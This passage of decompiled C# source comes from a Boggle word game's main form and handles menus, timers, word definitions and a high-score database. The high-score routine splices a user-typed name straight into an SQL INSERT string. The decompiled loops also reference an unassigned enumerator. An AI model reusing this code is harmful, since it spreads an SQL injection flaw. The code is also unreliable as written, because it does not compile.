sender, EventArgs e) { string timerText = this.tmrMain.TimerText; object o1 = LateBinding.LateGet(sender, (System.Type) null, "name", new object[0], (string[]) null, (bool[]) null); if (ObjectType.ObjTst(o1, (object) "tmrBtn1", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(0, 70, 0); this.tmrMain.LedOnColor = System.Drawing.Color.LawnGreen; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn2", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(0, 0, 70); this.tmrMain.LedOnColor = System.Drawing.Color.DeepSkyBlue; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn3", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Aquamarine; this.tmrMain.LedOffColor = System.Drawing.Color.LightCyan; this.tmrMain.LedOnColor = System.Drawing.Color.Teal; } else if (ObjectType.ObjTst(o1, (object) "tmrBtn4", false) == 0) { this.tmrMain.LedBackColor = System.Drawing.Color.Black; this.tmrMain.LedOffColor = System.Drawing.Color.FromArgb(70, 0, 0); this.tmrMain.LedOnColor = System.Drawing.Color.Red; } this.tmrMain.TimerText = timerText; this.btnAddWord.Focus(); } private void lstCompFoundWords_MouseUp(object sender, MouseEventArgs e) { if (StringType.StrCmp(modGlobal.Cubes.WordToShow, "", false) != 0) this.ShowWordThread.Abort(); modGlobal.Cubes.WordToShow = this.lstCompFoundWords.GetItemText(RuntimeHelpers.GetObjectValue(this.lstCompFoundWords.SelectedItem)); this.ShowWordThread = new Thread(new ThreadStart(this.ShowWord)); this.ShowWordThread.Start(); if (!this.mnuEnableDefSearch.Checked) return; while (this.ShowWordThread.ThreadState == System.Threading.ThreadState.Running) Application.DoEvents(); this.txtMain.Text = "Querying Defenition..."; Application.DoEvents(); this.txtMain.Text = modFindWords.GetDef(this.lstCompFoundWords.GetItemText(RuntimeHelpers.GetObjectValue(this.lstCompFoundWords.SelectedItem))); this.txtMain.SelectionStart = 0; } private void ChangeMode(object sender, EventArgs e) { this.txtMain.Text = ""; object o1 = LateBinding.LateGet(sender, (System.Type) null, "text", new object[0], (string[]) null, (bool[]) null); if (ObjectType.ObjTst(o1, (object) "Board Game Mode", false) == 0) { modGlobal.GameMode = modGlobal.Mode.BoardGame; this.txtMain.Text = "---Board Game Mode---"; } else if (ObjectType.ObjTst(o1, (object) "Vs. Computer Mode", false) == 0) { modGlobal.GameMode = modGlobal.Mode.Vs; this.txtMain.Text = "---Vs. Computer Mode---"; } else if (ObjectType.ObjTst(o1, (object) "Teaching Mode", false) == 0) { int num = (int) MessageBox.Show("Teaching mode is not available on the PSC version of Boggle .Net. Sorry!", "Teaching Mode", MessageBoxButtons.OK); modGlobal.GameMode = modGlobal.Mode.Vs; this.txtMain.Text = "---Vs. Computer Mode---"; } this.txtMain.Text += "\r\n\r\nClick \"Game\" - \"New Game\" To Start!"; this.mnuNewGame.Enabled = true; this.mnuEndGame.Enabled = false; this.mnuBoardGameMode.Checked = false; this.mnuVsMode.Checked = false; this.mnuTeachingMode.Checked = false; LateBinding.LateSet(sender, (System.Type) null, "checked", new object[1] { (object) true }, (string[]) null); } private void ChangeLevel(object sender, EventArgs e) { object o1 = LateBinding.LateGet(sender, (System.Type) null, "text", new object[0], (string[]) null, (bool[]) null); if (ObjectType.ObjTst(o1, (object) "Level Easy", false) == 0) modGlobal.GameLevel = modGlobal.Level.Easy; else if (ObjectType.ObjTst(o1, (object) "Level Medium", false) == 0) modGlobal.GameLevel = modGlobal.Level.Medium; else if (ObjectType.ObjTst(o1, (object) "Level Hard", false) == 0) modGlobal.GameLevel = modGlobal.Level.Hard; else if (ObjectType.ObjTst(o1, (object) "Level Impossible to win", false) == 0) modGlobal.GameLevel = modGlobal.Level.Impossible; this.mnuLevelEasy.Checked = false; this.mnuLevelMedium.Checked = false; this.mnuLevelHard.Checked = false; this.mnuLevelImpossible.Checked = false; this.Round = 0; this.lblRound.Text = StringType.FromInteger(0); LateBinding.LateSet(sender, (System.Type) null, "checked", new object[1] { (object) true }, (string[]) null); } private void CheckHighScores() { OleDbCommand oleDbCommand = new OleDbCommand("Select Count(*) as C From HighScores", modGlobal.conBoggle); modGlobal.conBoggle.Open(); int num1 = IntegerType.FromObject(oleDbCommand.ExecuteScalar()); modGlobal.conBoggle.Close(); if (num1 != 0) { oleDbCommand.CommandText = "Select Min(Rounds) as R From HighScores"; modGlobal.conBoggle.Open(); num1 = IntegerType.FromObject(oleDbCommand.ExecuteScalar()); modGlobal.conBoggle.Close(); } if (this.HumanRounds <= num1) return; string str1; switch (modGlobal.GameLevel) { case modGlobal.Level.Easy: str1 = "Easy"; break; case modGlobal.Level.Medium: str1 = "Medium"; break; case modGlobal.Level.Hard: str1 = "Hard"; break; case modGlobal.Level.Impossible: str1 = "Impossible"; break; } string str2 = Interaction.InputBox("Congradulations!\r\nYou have made the Boggle .Net high score list!\r\nEnter your name (5 Char Max).", "New High Score"); if (StringType.StrCmp(str2, "", false) == 0 | Strings.Len(str2) > 5) str2 = "Lazy"; oleDbCommand.CommandText = "Select Count(*) as C From HighScores"; modGlobal.conBoggle.Open(); int num2 = IntegerType.FromObject(oleDbCommand.ExecuteScalar()); modGlobal.conBoggle.Close(); if (num2 >= 10) { oleDbCommand.CommandText = "Delete From HighScores Where Rounds = " + StringType.FromInteger(num1); modGlobal.conBoggle.Open(); oleDbCommand.ExecuteNonQuery(); modGlobal.conBoggle.Close(); } oleDbCommand.CommandText = "Insert Into HighScores (Name,[Level],Rounds,Score) Values ('" + Strings.UCase(str2) + "','" + str1 + "'," + StringType.FromInteger(this.HumanRounds) + "," + StringType.FromInteger(this.HumanScore) + ")"; modGlobal.conBoggle.Open(); oleDbCommand.ExecuteNonQuery(); modGlobal.conBoggle.Close(); } private void mnuEndGame_Click(object sender, EventArgs e) { if (this.ShowTextThread.ThreadState == System.Threading.ThreadState.Running) this.ShowTextThread.Suspend(); if (this.ShowWordThread.ThreadState == System.Threading.ThreadState.Running) this.ShowWordThread.Suspend(); this.tmrContMain.Enabled = false; this.tmrMain.TimerText = "000"; this.ScramSec = 5.0; this.btnAddWord.BogButtonEnabled = false; this.btnScramble.BogButtonEnabled = false; this.btnFinish.BogButtonEnabled = false; if (ObjectType.ObjTst(LateBinding.LateGet(sender, (System.Type) null, "text", new object[0], (string[]) null, (bool[]) null), (object) "Continue", false) != 0) { this.Round = 0; this.lblRound.Text = StringType.FromInteger(0); this.lblCompScore.Text = StringType.FromInteger(0); this.lblHumanScore.Text = StringType.FromInteger(0); this.lblHumanRounds.Text = StringType.FromInteger(0); this.lblComputerRounds.Text = StringType.FromInteger(0); this.mnuOptions.Enabled = true; this.CheckHighScores(); } modGlobal.Cubes.KillCubeThreads(); modGlobal.Cubes.CubesState = CubesCollection.StateOfCubes.Clear; this.picCubesUp.Refresh(); this.ShowDisplayText(" Game\r\nEnded!!", false, false, 180); switch (modGlobal.GameMode) { case modGlobal.Mode.Vs: this.ChangeMode((object) this.mnuVsMode, new EventArgs()); break; case modGlobal.Mode.BoardGame: this.ChangeMode((object) this.mnuBoardGameMode, new EventArgs()); break; case modGlobal.Mode.Teaching: this.ChangeMode((object) this.mnuTeachingMode, new EventArgs()); break; } } private void mnuEnableDefSearch_Click(object sender, EventArgs e) { this.mnuEnableDefSearch.Checked = !this.mnuEnableDefSearch.Checked; if (!this.mnuEnableDefSearch.Checked) return; int num = (int) MessageBox.Show("Defenition search is enabled. You must be connected to the internet in order for this feature to function properly.", "Defenition Search Enabled", MessageBoxButtons.OK); } private void ChangeTimerInterval(object sender, EventArgs e) { object o1 = LateBinding.LateGet(sender, (System.Type) null, "text", new object[0], (string[]) null, (bool[]) null); if (ObjectType.ObjTst(o1, (object) ":30", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec030; else if (ObjectType.ObjTst(o1, (object) "1:00", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec100; else if (ObjectType.ObjTst(o1, (object) "1:30", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec130; else if (ObjectType.ObjTst(o1, (object) "2:00", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec200; else if (ObjectType.ObjTst(o1, (object) "2:30", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec230; else if (ObjectType.ObjTst(o1, (object) "3:00", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec300; else if (ObjectType.ObjTst(o1, (object) "3:30", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec330; else if (ObjectType.ObjTst(o1, (object) "4:00", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec400; else if (ObjectType.ObjTst(o1, (object) "4:30", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec430; else if (ObjectType.ObjTst(o1, (object) "5:00", false) == 0) modGlobal.TimerInterval = modGlobal.Interval.Sec500; this.mnuTmr30.Checked = false; this.mnuTmr100.Checked = false; this.mnuTmr130.Checked = false; this.mnuTmr200.Checked = false; this.mnuTmr230.Checked = false; this.mnuTmr300.Checked = false; this.mnuTmr330.Checked = false; this.mnuTmr400.Checked = false; this.mnuTmr430.Checked = false; this.mnuTmr500.Checked = false; LateBinding.LateSet(sender, (System.Type) null, "checked", new object[1] { (object) true }, (string[]) null); } private void mnuEnableTimerFlash_Click(object sender, EventArgs e) { this.mnuEnableTimerFlash.Checked = !this.mnuEnableTimerFlash.Checked; if (this.mnuEnableTimerFlash.Checked) this.tmrMain.EnableFlash = true; else this.tmrMain.EnableFlash = false; } private void mnuExitGame_Click(object sender, EventArgs e) { this.mnuEndGame_Click((object) this.mnuEndGame, new EventArgs()); this.Dispose(); ProjectData.EndApp(); } private void btnContinue_Click_1(object sender, EventArgs e) { this.mnuEndGame_Click((object) this.btnContinue, new EventArgs()); this.mnuNewGame_Click((object) this.mnuEndGame, new EventArgs()); } private void btnScramble_Click_1(object sender, EventArgs e) { this.txtMain.Text = "Re-Scrambling..."; this.txtMain.Refresh(); this.lstCompFoundWords.DataSource = (object) null; this.lstCompFoundWords.Items.Clear(); this.lstHumanWordsFound.Items.Clear(); this.FoundWords.Clear(); try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeLabel.Visible = false; modGlobal.myCube.CubeHighLight = System.Drawing.Color.LightGray; modGlobal.myCube.CubeTextColor = System.Drawing.Color.DarkBlue; modGlobal.myCube.SetRndCubeLetter(); } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } modGlobal.Cubes.CubesState = CubesCollection.StateOfCubes.Spinning; this.tmrContMain.Enabled = false; modGlobal.Cubes.ScrambleCubes(); while (modGlobal.Cubes.CubesAreScrambling) Application.DoEvents(); this.tmrContMain.Enabled = true; modGlobal.Cubes.CubesState = CubesCollection.StateOfCubes.Normal; this.picCubesUp.Refresh(); try { foreach (Cube cube in (CollectionBase) modGlobal.Cubes) { modGlobal.myCube = cube; modGlobal.myCube.CubeLabel.Visible = true; } } finally { IEnumerator enumerator; if (enumerator is IDisposable) ((IDisposable) enumerator).Dispose(); } } private void mnuEnableWordValidation_Click(object sender, EventArgs e) => this.mnuEnableWordValidation.Checked = !this.mnuEnableWordValidation.Checked; private void lstHumanWordsFound_MouseUp(object sender, MouseEventArgs e) { if (!this.mnuEnableDefSearch.Checked) return; while (this.ShowWordThread.ThreadState == System.Threading.ThreadState.Running) Application.DoEvents(); this.txtMain.Text = "Querying Defenition..."; Application.DoEvents(); this.txtMain.Text = modFindWords.GetDef(this.lstHumanWordsFound.GetItemText(RuntimeHelpers.GetObjectValue(this.lstHumanWordsFound.SelectedItem))); this.txtMain.SelectionStart = 0; } private void btnFinish_Click(object sender, EventArgs e) { this.Sec = 0.0; this.Min = 0; this.tmrMain.TimerText = "000"; } private void mnuTips_Click(object sender, EventArgs e) { frmWelcome frmWelcome = new frmWelcome(); frmWelcome.chkMain.Visible = false; frmWelcome.Show(); } private void mnuAbout_Click(object sender, EventArgs e) => new frmAbout().Show(); private void mnuHighScores_Click(object sender, EventArgs e) => new frmHighScores().Show(); } }